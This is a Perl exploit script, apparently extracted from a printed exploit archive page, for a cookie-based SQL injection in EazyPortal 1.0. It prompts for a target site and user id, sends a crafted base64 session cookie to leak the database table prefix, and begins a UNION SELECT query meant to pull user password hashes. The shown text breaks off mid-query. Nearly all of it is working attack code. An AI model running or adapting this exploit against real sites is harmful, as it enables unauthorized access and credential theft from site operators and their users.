1 #!/usr/bin/perl
2 #
3 #
Vendor url: http://www.eazyportal.com/
4 #
5 #
by Iron − http://www.randombase.com
6 #
7 #
exploit goes through $_COOKIE
8 #
9 use LWP::UserAgent;
10 use MIME::Base64;
11
12 print "#
13
# EazyPortal <= 1.0 SQL Injection Exploit
14
# By Iron − www.randombase.com
15
# Greets to everyone at RootShell Security Group
16
#
17
# Example target url: http://www.target.com/Portal/
18 Target url?";
19 chomp($target=<stdin>);
20 if($target !~ /^http:\/\//)
21 {
22
$target = "http://".$target;
23 }
24 if($target !~ /\/$/)
25 {
26
$target .= "/";
27 }
28 print "User id to retrieve name/password from? (1 = admin by default)";
29 chomp($target_id=<stdin>);
30 print "\n[+]Retrieving table prefix...";
31 @header = (’Cookie’ => ’ session_vars=YTo2OntzOjU6InVuYW1lIjtzOjEyOiInIEVSUk9SIFpPTUciO3M6NDoidXB3ZCI7czozMjoiMDk4ZjZiY2Q0NjIxZDM3M
2NhZGU0ZTgzMjYyN2I0ZjYiO3M6MzoidWlkIjtzOjE6IjEiO3M6NDoidWdtdCI7czoyOiIrMCI7czoxMDoidWxhc3R2aXNpdCI7czoxMDoiMTIwNDA0NjIwNiI7czo0OiJ
wcml2IjthOjk6e3M6NDoibmV3cyI7czo0OiJuZXdzIjtzOjU6InBvbGxzIjtzOjI6InBvIjtzOjc6Im1haWxpbmciO3M6MjoibWEiO3M6NToicGFnZXMiO3M6MjoicGEiO3M6N
ToidXNlcnMiO3M6MjoidXMiO3M6ODoic2V0dGluZ3MiO3M6Mjoic2UiO3M6NToiZm9ydW0iO3M6MjoiZm8iO3M6NjoiYmxvY2tzIjtzOjI6ImJsIjtzOjg6ImRvd25sb2Fk
IjtzOjI6ImRvIjt9fQ==’);
32 $ua = LWP::UserAgent−>new;
33 $ua−>timeout(10);
34 $ua−>env_proxy;
35 $ua−>agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
36 $response = $ua−>get($target, @header);
37 if ($response−>is_success)
38 {
39 #print $response−>content;
40
if($response−>content =~ /select \* from (.*)users where ustatus/i)
41
{
42
print "\n[+]Got prefix: $1";
43
$prefix = $1;
44
}
45
else
46
{
47
print "\n[−]Failed, trying empty prefix.";
48
$prefix = "";
Page 1/3
EazyPortal 1.0 COOKIE Remote SQL Injection Exploit
Iron
02/27/2008
49
}
50 }
51 else
52 {
53 die "Error: ".$response−>status_line;
54 }
55 print "\n[+]Building cookie";
56 $query = "lalalalalala’ UNION SELECT upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upw